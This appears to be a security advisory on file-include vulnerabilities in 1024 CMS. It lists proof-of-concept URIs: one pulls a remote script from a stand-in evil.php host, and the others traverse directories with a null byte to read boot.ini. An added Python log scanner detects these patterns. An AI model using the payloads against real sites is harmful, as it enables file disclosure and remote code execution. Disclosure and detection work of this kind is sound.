1024 CMS Multiple Remote and Local File Include Vulnerabilities
BID:30091
Info
| Bugtraq ID: | 30091 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 04 2008 12:00AM |
| Updated: | Feb 06 2009 10:18PM |
| Credit: | Digital Security Research Group |
| Vulnerable: | Treble Designs 1024 CMS 1.4.4 RFC; Treble Designs 1024 CMS 1.4.3 |
| Not Vulnerable: | |
Discussion
1024 CMS is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to execute local script code in the context of the application or to execute remote scripts in the context of the webserver process. This may allow the attacker to access sensitive information that may aid in further attacks or to compromise the application.
1024 CMS 1.4.3 and 1.4.4 RFC are vulnerable; other versions may also be affected.
Exploit / POC
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/fr/moderator/default.php?t=download&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/de/moderator/default.php?t=forum&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/add.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/newest.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/forum/default/content.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
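With no vendor patch listed, requests that match the proof-of-concept patterns can at least be flagged in web-server access logs. The Python sketch below is an added example, not part of the original advisory: the parameter names come from the URIs listed in it, while the function names, the combined log format and the sample log lines (including the `/cms` install path) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Include-related parameters taken from the advisory's proof-of-concept URIs.
INCLUDE_PARAMS = {"page_include", "theme_dir", "admin_theme_dir", "page", "lang"}
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request line of a combined-format access-log entry (format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return the reasons a parameter value looks like a file-include attempt."""
    for _ in range(3):  # undo nested encoding such as %252e%252e%252f
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if TRAVERSAL.search(value):
        reasons.append("traversal")
    if REMOTE.match(value):
        reasons.append("remote-url")
    return reasons


def scan(log_lines):
    """Yield (line_no, path, param, reasons) for each suspicious request."""
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl already percent-decodes each value once.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify(value) if name in INCLUDE_PARAMS else []
            if reasons:
                yield no, url.path, name, reasons


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2008:10:00:01 +0000] "GET /cms/index.php?page=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [04/Jul/2008:10:00:07 +0000] "GET /cms/themes/default/layouts/standard.php?theme_dir=../../../boot.ini%00 HTTP/1.1" 200 211',
    '192.0.2.44 - - [04/Jul/2008:10:00:09 +0000] "GET /cms/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php HTTP/1.1" 200 87',
    '192.0.2.44 - - [04/Jul/2008:10:00:12 +0000] "GET /cms/lang/en/moderator/default.php?t=news&lang=%252e%252e%252fboot.ini HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit records an attempt, not a successful include; the response status and size on the same log line help with triage.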
References
References:
- 1024 CMS Homepage (Treble Designs)
- [DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC (Digital Security Research Group [DSecRG])